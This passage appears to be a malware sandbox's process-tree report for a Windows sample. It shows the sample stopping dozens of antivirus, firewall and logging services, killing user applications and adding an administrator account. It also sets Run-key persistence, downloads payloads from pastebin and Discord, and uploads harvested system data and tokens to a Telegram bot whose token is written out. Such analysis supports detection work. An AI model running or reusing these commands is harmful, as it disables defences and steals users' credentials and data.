    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3392
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1788
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2628
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2024
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1580
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3448
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4732
- C:\Windows\system32\taskkill.exe
  taskkill /f /t /im "MSASCui.exe"
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3016
- C:\Windows\system32\net.exe
  net stop "wuauserv"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4856
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "wuauserv"
    3⤵
    PID:4376
- C:\Windows\system32\net.exe
  net stop "security center"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4960
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "security center"
    3⤵
    PID:2584
- C:\Windows\system32\net.exe
  net stop sharedaccess
  2⤵
  PID:4604
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sharedaccess
    3⤵
    PID:1444
- C:\Windows\system32\netsh.exe
  netsh firewall set opmode mode-disable
  2⤵
  PID:3768
- C:\Windows\system32\net.exe
  net stop "Security Center" /y
  2⤵
  PID:1808
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Security Center" /y
    3⤵
    PID:4016
- C:\Windows\system32\net.exe
  net stop "Automatic Updates" /y
  2⤵
  PID:1408
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Automatic Updates" /y
    3⤵
    PID:3140
- C:\Windows\system32\net.exe
  net stop "Symantec Core LC" /y
  2⤵
  PID:3076
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Symantec Core LC" /y
    3⤵
    PID:2868
- C:\Windows\system32\net.exe
  net stop "SAVScan" /y
  2⤵
  PID:3528
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SAVScan" /y
    3⤵
    PID:2216
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Firewall Monitor Service" /y
  2⤵
  PID:3732
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Firewall Monitor Service" /y
    3⤵
    PID:428
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Auto-Protect Service" /y
  2⤵
  PID:1348
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Auto-Protect Service" /y
    3⤵
    PID:4872
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Auto Protect Service" /y
  2⤵
  PID:2504
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y
    3⤵
    PID:5016
- C:\Windows\system32\net.exe
  net stop "McAfee Spamkiller Server" /y
  2⤵
  PID:1724
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McAfee Spamkiller Server" /y
    3⤵
    PID:1856
- C:\Windows\system32\net.exe
  net stop "McAfee Personal Firewall Service" /y
  2⤵
  PID:4788
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McAfee Personal Firewall Service" /y
    3⤵
    PID:4408
- C:\Windows\system32\net.exe
  net stop "McAfee SecurityCenter Update Manager" /y
  2⤵
  PID:1968
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McAfee SecurityCenter Update Manager" /y
    3⤵
    PID:2460
- C:\Windows\system32\net.exe
  net stop "Symantec SPBBCSvc" /y
  2⤵
  PID:3372
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Symantec SPBBCSvc" /y
    3⤵
    PID:2928
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Trend Micro Proxy Service" /y
    3⤵
    PID:1740
- C:\Windows\system32\net.exe
  net stop "Ahnlab Task Scheduler" /y
  2⤵
  PID:5052
- C:\Windows\system32\net.exe
  net stop navapsvc /y
  2⤵
  PID:3700
- C:\Windows\system32\net.exe
  net stop "Sygate Personal Firewall Pro" /y
  2⤵
  PID:1144
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y
    3⤵
    PID:1056
- C:\Windows\system32\net.exe
  net stop vrmonsvc /y
  2⤵
  PID:3016
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop vrmonsvc /y
    3⤵
    PID:3488
- C:\Windows\system32\net.exe
  net stop MonSvcNT /y
  2⤵
  PID:4840
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MonSvcNT /y
    3⤵
    PID:4196
- C:\Windows\system32\net.exe
  net stop SAVScan /y
  2⤵
  PID:1016
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SAVScan /y
    3⤵
    PID:4520
- C:\Windows\system32\net.exe
  net stop NProtectService /y
  2⤵
  PID:936
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NProtectService /y
    3⤵
    PID:404
- C:\Windows\system32\net.exe
  net stop ccSetMGR /y
  2⤵
  PID:2220
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccSetMGR /y
    3⤵
    PID:1460
- C:\Windows\system32\net.exe
  net stop ccEvtMGR /y
  2⤵
  PID:4712
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccEvtMGR /y
    3⤵
    PID:1376
- C:\Windows\system32\net.exe
  net stop srservice /y
  2⤵
  PID:3012
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop srservice /y
    3⤵
    PID:4824
- C:\Windows\system32\net.exe
  net stop "Symantec Network Drivers Service" /y
  2⤵
  PID:3708
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Symantec Network Drivers Service" /y
    3⤵
    PID:4316
- C:\Windows\system32\net.exe
  net stop "norton Unerase Protection" /y
  2⤵
  PID:4552
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton Unerase Protection" /y
    3⤵
    PID:2028
- C:\Windows\system32\net.exe
  net stop MskService /y
  2⤵
  PID:2488
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MskService /y
    3⤵
    PID:3724
- C:\Windows\system32\net.exe
  net stop MpfService /y
  2⤵
  PID:3716
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MpfService /y
    3⤵
    PID:2140
- C:\Windows\system32\net.exe
  net stop mcupdmgr.exe /y
  2⤵
  PID:3444
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mcupdmgr.exe /y
    3⤵
    PID:2128
- C:\Windows\system32\net.exe
  net stop "McAfeeAntiSpyware" /y
  2⤵
  PID:1580
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McAfeeAntiSpyware" /y
    3⤵
    PID:4128
- C:\Windows\system32\net.exe
  net stop helpsvc /y
  2⤵
  PID:3520
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop helpsvc /y
    3⤵
    PID:2864
- C:\Windows\system32\net.exe
  net stop ERSvc /y
  2⤵
  PID:3860
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ERSvc /y
    3⤵
    PID:2336
- C:\Windows\system32\net.exe
  net stop "*norton*" /y
  2⤵
  PID:3252
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "*norton*" /y
    3⤵
    PID:2940
- C:\Windows\system32\net.exe
  net stop "*Symantec*" /y
  2⤵
  PID:3480
- C:\Windows\system32\net.exe
  net stop "*McAfee*" /y
  2⤵
  PID:4780
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "*McAfee*" /y
    3⤵
    PID:2504
- C:\Windows\system32\net.exe
  net stop ccPwdSvc /y
  2⤵
  PID:4708
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccPwdSvc /y
    3⤵
    PID:2020
- C:\Windows\system32\net.exe
  net stop "Symantec Core LC" /y
  2⤵
  PID:1684
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Symantec Core LC" /y
    3⤵
    PID:2288
- C:\Windows\system32\net.exe
  net stop navapsvc /y
  2⤵
  PID:1672
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop navapsvc /y
    3⤵
    PID:2896
- C:\Windows\system32\net.exe
  net stop "Serv-U" /y
  2⤵
  PID:456
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Serv-U" /y
    3⤵
    PID:208
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Auto Protect Service" /y
  2⤵
  PID:4644
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y
    3⤵
    PID:4560
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Client" /y
  2⤵
  PID:4332
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Client" /y
    3⤵
    PID:1056
- C:\Windows\system32\net.exe
  net stop "Symantec AntiVirus Client" /y
  2⤵
  PID:1876
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Symantec AntiVirus Client" /y
    3⤵
    PID:3904
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators session /ADD
      4⤵
      PID:3488
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Server" /y
  2⤵
  PID:4044
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Server" /y
    3⤵
    PID:1500
- C:\Windows\system32\net.exe
  net stop "NAV Alert" /y
  2⤵
  PID:3804
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "NAV Alert" /y
    3⤵
    PID:3960
- C:\Windows\system32\net.exe
  net stop "Nav Auto-Protect" /y
  2⤵
  PID:1336
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Nav Auto-Protect" /y
    3⤵
    PID:4324
- C:\Windows\system32\net.exe
  net stop "McShield" /y
  2⤵
  PID:1252
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McShield" /y
    3⤵
    PID:1204
- C:\Windows\system32\net.exe
  net stop "DefWatch" /y
  2⤵
  PID:4680
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "DefWatch" /y
    3⤵
    PID:1088
- C:\Windows\system32\net.exe
  net stop eventlog /y
  2⤵
  PID:1444
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop eventlog /y
    3⤵
    PID:2064
- C:\Windows\system32\net.exe
  net stop InoRPC /y
  2⤵
  PID:2924
- C:\Windows\system32\net.exe
  net stop InoRT /y
  2⤵
  PID:3216
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop InoRT /y
    3⤵
    PID:4700
- C:\Windows\system32\net.exe
  net stop InoTask /y
  2⤵
  PID:1636
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop InoTask /y
    3⤵
    PID:5016
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Auto Protect Service" /y
  2⤵
  PID:4704
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y
    3⤵
    PID:4056
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Client" /y
  2⤵
  PID:4248
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Client" /y
    3⤵
    PID:3000
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Corporate Edition" /y
  2⤵
  PID:1856
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Corporate Edition" /y
    3⤵
    PID:660
- C:\Windows\system32\net.exe
  net stop "ViRobot Professional Monitoring" /y
  2⤵
  PID:4724
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "ViRobot Professional Monitoring" /y
    3⤵
    PID:1684
- C:\Windows\system32\net.exe
  net stop "PC-cillin Personal Firewall" /y
  2⤵
  PID:3752
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "PC-cillin Personal Firewall" /y
    3⤵
    PID:4760
- C:\Windows\system32\net.exe
  net stop "Trend Micro Proxy Service" /y
  2⤵
  PID:3372
- C:\Windows\system32\net.exe
  net stop "Trend NT Realtime Service" /y
  2⤵
  PID:216
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Trend NT Realtime Service" /y
    3⤵
    PID:3776
- C:\Windows\system32\net.exe
  net stop "McAfee.com McShield" /y
  2⤵
  PID:456
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McAfee.com McShield" /y
    3⤵
    PID:4516
- C:\Windows\system32\net.exe
  net stop "McAfee.com VirusScan Online Realtime Engine" /y
  2⤵
  PID:4564
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McAfee.com VirusScan Online Realtime Engine" /y
    3⤵
    PID:2116
- C:\Windows\system32\net.exe
  net stop "SyGateService" /y
  2⤵
  PID:1280
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SyGateService" /y
    3⤵
    PID:5052
- C:\Windows\system32\net.exe
  net stop "Sygate Personal Firewall Pro" /y
  2⤵
  PID:1064
- C:\Windows\system32\net.exe
  net stop "Sophos Anti-Virus" /y
  2⤵
  PID:3700
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos Anti-Virus" /y
    3⤵
    PID:4856
- C:\Windows\system32\net.exe
  net stop "Sophos Anti-Virus Network" /y
  2⤵
  PID:4456
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos Anti-Virus Network" /y
    3⤵
    PID:1500
- C:\Windows\system32\net.exe
  net stop "eTrust Antivirus Job Server" /y
  2⤵
  PID:2356
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "eTrust Antivirus Job Server" /y
    3⤵
    PID:3960
- C:\Windows\system32\net.exe
  net stop "eTrust Antivirus Realtime Server" /y
  2⤵
  PID:3748
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "eTrust Antivirus Realtime Server" /y
    3⤵
    PID:4840
- C:\Windows\system32\net.exe
  net stop "Sygate Personal Firewall Pro" /y
  2⤵
  PID:1016
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y
    3⤵
    PID:1100
- C:\Windows\system32\net.exe
  net stop "eTrust Antivirus RPC Server" /y
  2⤵
  PID:1252
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "eTrust Antivirus RPC Server" /y
    3⤵
    PID:1540
- C:\Windows\system32\net.exe
  net stop netsvcs
  2⤵
  PID:3356
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop netsvcs
    3⤵
    PID:4832
- C:\Windows\system32\net.exe
  net stop spoolnt
  2⤵
  PID:1844
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop spoolnt
    3⤵
    PID:2780
- C:\Windows\system32\rundll32.exe
  RUNDLL32 USER32.DLL SwapMouseButton
  2⤵
  PID:3056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K black.bat
  2⤵
  PID:3772
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4208
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1364
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4752
- C:\Windows\system32\tskill.exe
  tskill iexplore
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3180
- C:\Windows\system32\tskill.exe
  tskill msnmsgr
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4576
- C:\Windows\system32\tskill.exe
  tskill excel
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4912
- C:\Windows\system32\tskill.exe
  tskill iTunes
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2560
- C:\Windows\system32\tskill.exe
  tskill calc
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1264
- C:\Windows\system32\tskill.exe
  tskill msaccess
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3484
- C:\Windows\system32\tskill.exe
  tskill safari
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4700
- C:\Windows\system32\tskill.exe
  tskill mspaint
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4076
- C:\Windows\system32\tskill.exe
  tskill outlook
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2812
- C:\Windows\system32\tskill.exe
  tskill WINWORD
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4056
- C:\Windows\system32\tskill.exe
  tskill msnmsgr
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4704
- C:\Windows\system32\tskill.exe
  tskill firefox
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3132
- C:\Windows\system32\tskill.exe
  tskill LimreWire
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:176
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K 2b2crypt.cmd
  2⤵
  PID:112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K 2b2crypt.m.cmd
  2⤵
  PID:4192
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Invoke-WebRequest https://pastebin.com/raw/2K5m42Xp -outfile ycynlog.cmd"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K ycynlog.cmd
  2⤵
  - NTFS ADS
  PID:1068
- - C:\Windows\system32\attrib.exe
    attrib +h +s ycynlog.cmd
    3⤵
    - Views/modifies file attributes
    PID:1624
- - C:\Windows\system32\reg.exe
    reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_5072_toolbar" /t "REG_SZ" /d ycynlog.cmd /f
    3⤵
    - Adds Run key to start application
    PID:4076
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\.bat /f
    3⤵
    - Modifies registry key
    PID:2900
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f
    3⤵
    PID:2000
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe', 'GetToken.exe')"
    3⤵
    PID:2012
- - C:\Users\Admin\GetToken.exe
    GetToken.exe
    3⤵
    PID:2428
- - C:\Windows\system32\curl.exe
    curl -s -o IP.txt https://ipv4.wtfismyip.com/text
    3⤵
    PID:3584
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table >C:\Users\Admin\apps.txt"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2564
- - C:\Windows\system32\curl.exe
    curl -v -F document=@C:\Users\Admin\apps.txt https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
    3⤵
    PID:1404
- - C:\Windows\system32\ipconfig.exe
    ipconfig
    3⤵
    - Gathers network information
    PID:4692
- - C:\Windows\system32\getmac.exe
    getmac
    3⤵
    PID:1548
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get caption, name, deviceid, numberofcores, maxclockspeed, status
    3⤵
    PID:1140
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic computersystem get totalphysicalmemory
    3⤵
    PID:1672
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic partition get name,size,type
    3⤵
    PID:1972
- - C:\Windows\system32\systeminfo.exe
    systeminfo
    3⤵
    - Gathers system information
    PID:3136
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path softwarelicensingservice get OA3xOriginalProductKey
    3⤵
    PID:1580
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:1672
- - C:\Windows\system32\curl.exe
    curl -v -F document=@C:\Users\Admin\userdata.txt https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
    3⤵
    PID:4452
- - C:\Windows\system32\curl.exe
    curl -v -F document=@"Tokens.txt" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
    3⤵
    PID:4672
- - C:\Windows\system32\curl.exe
    curl -v -F document=@"Tokens.txt" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
    3⤵
    PID:4224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K FuckPorts.cmd
  2⤵
  PID:1540
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "Set-ExecutionPolicy Unrestricted"
    3⤵
    PID:2220
- - C:\Windows\system32\net.exe
    net localgroup administrators session /ADD
    3⤵
    PID:3904
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:1968
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2812
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2220
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2484
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:940
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1636
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:2200
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2896
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3520
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2200
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3408
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4020
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3104
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1344
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:940
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3408
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:456
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2936
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4332
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2996
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3448
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4872
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:2172
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4576
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4680
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4540
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2220
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1972
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4072
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1676
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:2144
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4756
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:2316
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3320
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4752
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1580
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:1968
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3520
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:1460
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3484
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4692
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3484
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4576
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:528
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4452
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1460
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:1348
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3904
- - C:\Windows\system32\netsh.exe
